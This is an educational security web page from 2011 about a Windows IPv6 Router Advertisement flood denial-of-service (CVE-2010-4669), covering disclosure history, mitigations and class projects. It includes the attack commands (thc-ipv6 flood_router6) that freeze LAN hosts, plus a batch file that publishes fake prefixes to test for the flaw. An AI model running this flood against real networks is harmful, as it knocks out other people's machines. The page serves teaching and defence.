Win 7 DoS by RA Packets

Added 9-15-2011: Win 8 Developer Preview is also vulnerable

Added 5-30-2011: RA Guard Evasion

Added 5-29-2011: FreeBSD is also vulnerable!

Executive Summary

This is extremely dangerous! A single device can instantly stop all the Windows machines on a Local Area Network. In my tests, my Windows 7 virtual machine freezes totally and the only way to revive it is shutting the power off--an abnormal shutdown.

A student recorded this video, which makes it easier for people to quickly see the importance of the Windows IPv6 Router Advertisement vulnerability, without bothering with the technical details.

Imagine the effect of a single attacker on a small business, Internet coffeehouse, or any other LAN. This works on all Windows machines with IPv6 enabled, which includes Windows XP, Vista, Windows 7, Server 2008, and more. Mike Qaissaunee reported to me that it also stops X-Box and PS3 game consoles.

Suppose someone writes this into a malicious Web attack, so everyone who views a malicious Web page instantly kills all the machines on their LAN!

As far as I know, this attack will not traverse routers, so it "only" affects your local broadcast domain. But isn't that enough to deserve a security alert and a patch? Apparently not. Microsoft has told me and Mark Heuse* that they don't intend to patch this.

Responsible Disclosure

I regarded this as too dangerous to discuss on the Internet, and sent it to Microsoft privately. However, they informed me that this is not a new attack--it has been publicly known for months:

Excellent advisory from Marc Heuse* with complete disclosure timeline

Multiple Vendors IPv6 Neighbor Discovery Router Advertisement Remote Denial of Service Vulnerability

CVE-2010-4669 - Router Advertisements Cause DoS in Windows

Mitigation

There is no patch from Microsoft. But there are three four ways I know of to protect your computers:

Turning Off Router Discovery

I recommend turning off Router Discovery on all servers and any other machines that do not need "Stateless Autoconfiguration" (automatically configured IPv6 addresses), with this command (execute it from an Administrator Command Prompt):

netsh interface ipv6 set interface "Local Area Connection" routerdiscovery=disabled
I found that solution here: http://social.technet.microsoft.com/Forums/en-US/w7itpronetworking/thread/768252f8-8872-453b-aa8f-1c4fd6c52856

Blocking Rogue Router Advertisements with Windows Firewall

This method allows you to use Stateless Autoconfiguration from your authorized gateways, but block dumb rogues. However, a smart rogue could just sniff your Router Advertisement packets and spoof the authorized source address, to bypass the firewall rule. So this is a weak defense.

To do this, open "Windows Firewall with Advanced Security" and double-click the "Core Networking - Router Advertisement (ICMPv6-In)" rule, as shown below on this page:

In the Properties sheet, on the Scope tab, in the "Remote IP address" section, the IP address starts at fe80::/64, which allows any host on the LAN to send Router Advertisements. Edit this to a more specific address which matches your authorized servers, as shown below on this page:

The Attack

Attacker is a BackTrack 4 R2 Linux Virtual Machine. On the attacker, execute these commands, but if you want to be able to see the effect and not just kill the target, cancel the attack within 1 or 2 seconds with Ctrl+C:

cd /pentest/spoofing/thc-ipv6

./flood_router6 eth0

Ctrl+C

Result

Any Win 7 machine on the same LAN is dead instantly, as all its resources are consumed joining thousands of fake IPv6 networks. To see the effect, cancel the attack very rapidly with Ctrl+C. Then with IPCONFIG you can see the effect on the target.


Batch File to Test for Vulnerability

On a Windows machine, run this batch file. Then run IFCONFIG on the other machines in your network. If they are vulnerable, they will show IPv6 addresses starting with dead:, as shown in the figure under the code.

ECHO TESTING YOUR NETWORK FOR IPv6 ROUTER ADVERTISEMENT VULNERABILITY

@ECHO OFF

netsh int ipv6 set addr "Local Area Connection" dead:1::1/64

netsh interface ipv6 set interface "Local Area Connection" routerdiscovery=enabled

netsh int ipv6 add route dead:407::/64 "Local Area Connection" siteprefixlength=64 publish=yes
ping 127.0.0.1 -n 3 -w 1000
netsh int ipv6 del route dead:407::/64 "Local Area Connection" 
ECHO SENDING ADVERTISEMENT #1 OF 3

netsh int ipv6 add route dead:408::/64 "Local Area Connection" siteprefixlength=64 publish=yes
ping 127.0.0.1 -n 3 -w 1000
netsh int ipv6 del route dead:408::/64 "Local Area Connection" 
ECHO SENDING ADVERTISEMENT #2 OF 3

netsh int ipv6 add route dead:409::/64 "Local Area Connection" siteprefixlength=64 publish=yes
ping 127.0.0.1 -n 3 -w 1000
netsh int ipv6 del route dead:409::/64 "Local Area Connection" 
ECHO SENDING ADVERTISEMENT #3 OF 3


ECHO RUN IPCONFIG ON EACH MACHINE AND LOOK FOR ADDRESSES STARTING dead::

The result on a vulnerable machine:

Class Projects

Here are some projects designed for use in schools and demonstrations:

Win 7 DoS by RA Packets -- a slower, controllable version of the attack allows you to see just how many packets are required to stop a Windows machine.

Router Advertisements with scapy -- with scapy, you can craft packets easily so you can try variations of the attack.

How to perform the attack from Windows using npg

FreeBSD is Vulnerable Too

At the Layer One security conference, on May 28, 2011, Justin Hohner tested a FreeBSD machine and told me it was vulnerable the same way. So we set up a VM and tried it there, with the results shown below (click for full-size image):

The full-speed flood_router6 attack froze the FreeBSD machine so it was almost impossible to use, just like a Windows machine.

So I slowed the attack down to approximately 100 RAs per second to capture this image:

100 RAs per second raised the CPU to 19.9% in my test.

I filed a bug report.

We tested OpenBSD and it was not vulnerable: it just ignores all RAs after the first ten or so, the same way Ubuntu linux and Mac OS X do.

I just noticed that Marc Heuse already announced that BSD was vulnerable here so that is not a new discovery. (5-30-2011)

Windows 8 Developer Preview is Vulnerable Too

This video was made by Josival Junior--good work!


Written by Sam Bowne; last modified 12 pm May 30, 2011

* On April 6 I mistakenly attributed Mark Heuse's advisory to Cisco. I fixed that error at 12:30 am April 7, 2011.

6-17-11: Fixed anchor tag error

9-15-2011: Added Win 8 Developer Preview video